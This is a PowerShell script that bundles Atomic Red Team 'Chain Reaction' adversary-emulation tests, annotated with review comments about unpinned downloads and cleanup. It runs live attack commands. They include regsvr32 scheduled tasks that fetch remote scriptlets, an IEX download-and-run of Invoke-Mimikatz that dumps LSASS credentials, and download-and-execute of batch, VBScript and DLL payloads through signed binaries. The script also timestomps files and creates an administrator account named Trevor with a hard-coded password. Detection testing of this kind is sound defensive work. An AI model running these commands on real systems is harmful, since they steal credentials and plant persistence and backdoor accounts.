PowerShell script that combines the original Chain Reactions from Atomic Red Team
function Invoke-ChainReaction { | |
<# | |
.SYNOPSIS | |
A single script that combines the original Chain Reactions from the Atomic Red Team project | |
.PARAMETER Reaction | |
Specifies the Chain Reaction to execute. 'Plutonium' and 'DragonTailsSafe' are listed in ValidateSet but have no implementation in this script.
.EXAMPLE | |
Invoke-ChainReaction -Reaction DragonTails | |
#> | |
param ( | |
[Parameter(Mandatory)] | |
[String] | |
[ValidateSet('Argonaut', 'Cyclotron', 'DragonTails', 'DragonTailsSafe', 'Fission', 'Plutonium', 'Qbot', 'RBMK')] | |
$Reaction | |
) | |
function Invoke-DragonTails {
# Chain Reaction "DragonTails": scheduled-task proxy execution via regsvr32, credential
# dumping (only when elevated), then timestomping and deletion of a marker file.
# No parameters, no return value; every step is meant to be noisy for detection tooling.
Write-Host "Starting execution DragonTails" -ForegroundColor Red
# Tactic: Privilege Escalation / Execution
# Create Scheduled Task With RegSv32 Payload
# The task runs regsvr32 against a remote .sct scriptlet (T1218.010, the "Squiblydoo" pattern).
# The URL is pinned to a commit hash, so the scriptlet content cannot change under the test.
# Create, run once, then delete -- unlike Fission, this task is not left behind.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
#Test to determine if running as administrator. Thanks to Flare for this function https://github.com/fireeye/flare-vm/blob/master/install.ps1#L249
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent() )
if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
# NOTE(review): this pulls Invoke-Mimikatz from the Empire repository's dev branch -- unpinned,
# no integrity check -- and runs it elevated through IEX. Whoever controls that URL controls
# what executes here as administrator; pin to a commit or host a vetted copy before running
# this anywhere but a disposable lab. -DumpCreds reads LSASS, so real credentials on the
# host are written to the console.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
}
# Tactics: Defense Evasion
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
# Timestomping (T1070.006): the marker file is written to the *current working directory*
# (not %TEMP%), then its write/access/creation times are all set to a fixed 1945 date.
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
if ($file) {
Write-Host "Successfuly Created Atomic Test File" -ForegroundColor Green
}
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
# (T1107 has since been folded into T1070.004, Indicator Removal: File Deletion.)
# If test.txt could not be written above (unwritable working directory), $file is $null,
# the success message is skipped and this del reports an error.
del test.txt
Write-Host "Completed test of DragonTails" -ForegroundColor Green
}
function Invoke-Argonaut {
    # Chain Reaction "Argonaut": download a discovery batch file twice, once through
    # the 'wget' alias and once through the 'curl' alias, then run both copies with
    # cmd.exe. No parameters, no return value. Both .bat files are left in the drop
    # directory afterwards.
    Write-Host "Starting execution Argonaut" -ForegroundColor Red
    # Chain Reaction: Argonaut
    # Tactics: Execution:Powershell, Discovery
    # Swap $env:temp for $env:userprofile to drop the .bat files elsewhere.
    # TEMP=C:\Users\<username>\AppData\Local\Temp
    $dropDir = $env:temp
    $batUrl = 'https://raw.githubusercontent.com/pmichaudrc/Reaction-Artifacts/main/Discovery.bat'
    $firstBat = "$dropDir\1.bat"
    $secondBat = "$dropDir\2.bat"
    # 'wget' and 'curl' are Windows PowerShell aliases for Invoke-WebRequest. The
    # point is to see how these names look in detection tooling versus the usual
    # IWR / Invoke-WebRequest spellings.
    # NOTE(review): PowerShell 6+ no longer ships these aliases, and on newer Windows
    # builds 'curl' resolves to curl.exe, which does not take -OutFile -- expect the
    # curl line to fail there.
    # NOTE(review): the download is unpinned and unverified; what cmd.exe runs below
    # is whatever that URL serves at run time.
    wget $batUrl -OutFile $firstBat
    # Alternate Ending: Using curl
    curl $batUrl -OutFile $secondBat
    # Execute both copies of the batch file.
    cmd.exe /c $firstBat
    cmd.exe /c $secondBat
    Write-Host "Completed test of Argonaut" -ForegroundColor Green
}
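function Invoke-Cyclotron {
    # Chain Reaction "Cyclotron": fetch the Atomic Red Team "AllTheThings" test DLL
    # into %TEMP% and load it through a series of signed Microsoft binaries
    # (InstallUtil, RegSvcs, RegAsm, regsvr32, rundll32, odbcconf) so that each
    # signed-binary proxy-execution path (T1218.*) shows up in telemetry.
    # No parameters, no return value; the DLL is left in %TEMP% afterwards.
    Write-Host "Starting execution of Cyclotron" -ForegroundColor Red
    # (was "$temp = $temp = $env:temp" -- a harmless double assignment)
    $temp = $env:temp
    $dll = "$temp\AllTheThings.dll"
    # NOTE(review): both URLs point at the master branch, unpinned, and nothing
    # verifies a hash, so the binary loaded below is whatever that path serves at
    # run time. Pin to a commit or check a known hash before running this outside a
    # disposable lab.
    if ([Environment]::Is64BitOperatingSystem) {
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx64.dll" -OutFile $dll
    }
    else {
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile $dll
    }
    # T1218.004 InstallUtil, T1218.009 RegSvcs / RegAsm.
    # NOTE(review): these are the 32-bit Framework tools even when the x64 DLL was
    # downloaded; if that DLL is platform-targeted x64, the three .NET loaders would be
    # expected to fail with BadImageFormatException -- consider Framework64 on 64-bit
    # hosts. Verify against the DLL before changing.
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U $dll
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe $dll
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U $dll
    # T1218.010 regsvr32: unregister, register, then the /n /i install-string form.
    regsvr32.exe /s /u $dll
    regsvr32.exe /s $dll
    # T1218.011 rundll32. Quoted on purpose: in PowerShell argument mode an unquoted
    # "path,EntryPoint" is parsed as a two-element array and reaches rundll32 as two
    # separate arguments rather than the single "dll,entrypoint" token it expects.
    rundll32 "$dll,EntryPoint"
    # T1218.008 odbcconf. Quoted for the same reason: an unquoted "{ ... }" is a
    # PowerShell script block, so odbcconf would receive the block's text without the
    # braces and with $temp unexpanded instead of the literal "{ REGSVR <path> }".
    odbcconf.exe /s /a "{ REGSVR $dll }"
    regsvr32.exe /s /n /i:"Atomic Red Team Testing" $dll
    Write-Host "Completed test of Cyclotron" -ForegroundColor Green
}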
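function Invoke-Fission {
    # Chain Reaction "Fission": persistence through a recurring scheduled task, a
    # remote discovery script, and creation of a local account (elevated runs also
    # add it to Administrators). No parameters, no return value. Nothing here is
    # cleaned up: the task, the account and output.txt all stay behind by design.
    Write-Host "Starting execution of Fission" -ForegroundColor Red
    #Tactics: Persistence, Defense Evasion
    # This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
    # /F overwrites an existing "Atomic Testing" task: this function never deletes
    # it, so without /F a second run fails because the task name already exists.
    # NOTE(review): the .sct URL is on master, unpinned and unverified -- the task
    # runs whatever that path serves every 30 minutes until it is removed with:
    #   SCHTASKS /Delete /TN "Atomic Testing" /F
    SCHTASKS /Create /F /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
    # Tactic: Discovery
    # Have PowerShell download the Discovery.bat, output to a local file (for review later)
    # Note that the batch file's text is handed to Invoke-Expression as PowerShell,
    # not to cmd.exe, so lines that are not valid PowerShell produce errors; stdout
    # is captured to output.txt in the current working directory.
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
    # Tactic: Credential Access
    # Add a user, then add to group
    # NOTE(review): this creates a real local account with a hard-coded, published
    # password and never removes it; run "net user Trevor /delete" after the test.
    # Adding a local user normally needs an elevated token as well, so on an
    # unelevated run expect this step to fail too, not just the group add below.
    Net user /add Trevor SmshBgr123
    # Add user to group (only when the current token is in the Administrators role)
    $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent() )
    if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        net localgroup administrators Trevor /add
    }
    Write-Host "Completed test of Fission" -ForegroundColor Green
}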
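function Invoke-Qbot {
    # Chain Reaction "Qbot": download a VBScript emulating a Qbot infection chain
    # into %TEMP% and run it with wscript.exe. No parameters, no return value; the
    # .vbs is left in %TEMP% afterwards.
    Write-Host "Starting execution of Qbot" -ForegroundColor Red
    $temp = $env:temp
    $vbsPath = "$temp\Atmoic-Qbot.vbs"
    # NOTE(review): unpinned download from a personal repository with no hash check;
    # what wscript executes is whatever that URL serves at run time.
    Invoke-WebRequest "https://raw.githubusercontent.com/pmichaudrc/Reaction-Artifacts/main/qbot_infection_reaction.vbs" -OutFile $vbsPath
    # Test if we successfully downloaded the VBS file.
    # Test-Path on the file: the original tested the (always non-empty) path string,
    # so the error branch was unreachable and wscript ran even after a failed
    # download. A leftover copy from an earlier run also satisfies this check.
    if (Test-Path -LiteralPath $vbsPath) {
        wscript.exe $vbsPath
    }
    else {
        Write-Host "Error downloading VBS file" -ForegroundColor Yellow
        # return, not exit: exit here would terminate the calling host/session (and
        # the rest of an RBMK run), not just this reaction.
        return
    }
    Write-Host "Completed test of Qbot" -ForegroundColor Green
}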
function Invoke-RBMK {
    # Chain Reaction "RBMK": run every implemented reaction back to back, in the
    # original order (Argonaut, Cyclotron, DragonTails, Fission, Qbot). No
    # parameters, no return value. Note that DragonTails creates and deletes the
    # "Atomic Testing" task before Fission creates its own copy of the same name.
    Write-Host "Invoking all ChainReactions, prepare for nuclear explosion in Reactor 4" -ForegroundColor White
    foreach ($reactionName in @('Argonaut', 'Cyclotron', 'DragonTails', 'Fission', 'Qbot')) {
        & "Invoke-$reactionName"
    }
}
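# Dispatch on the validated -Reaction value.
switch ($Reaction) {
    'Argonaut'    { Invoke-Argonaut }
    'Cyclotron'   { Invoke-Cyclotron }
    'DragonTails' { Invoke-DragonTails }
    'Fission'     { Invoke-Fission }
    'Qbot'        { Invoke-Qbot }
    'RBMK'        { Invoke-RBMK }
    # 'Plutonium' and 'DragonTailsSafe' pass ValidateSet but have no Invoke-*
    # function in this script; warn instead of silently doing nothing.
    default { Write-Warning "Reaction '$Reaction' is accepted by ValidateSet but has no implementation in this script." }
}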
} |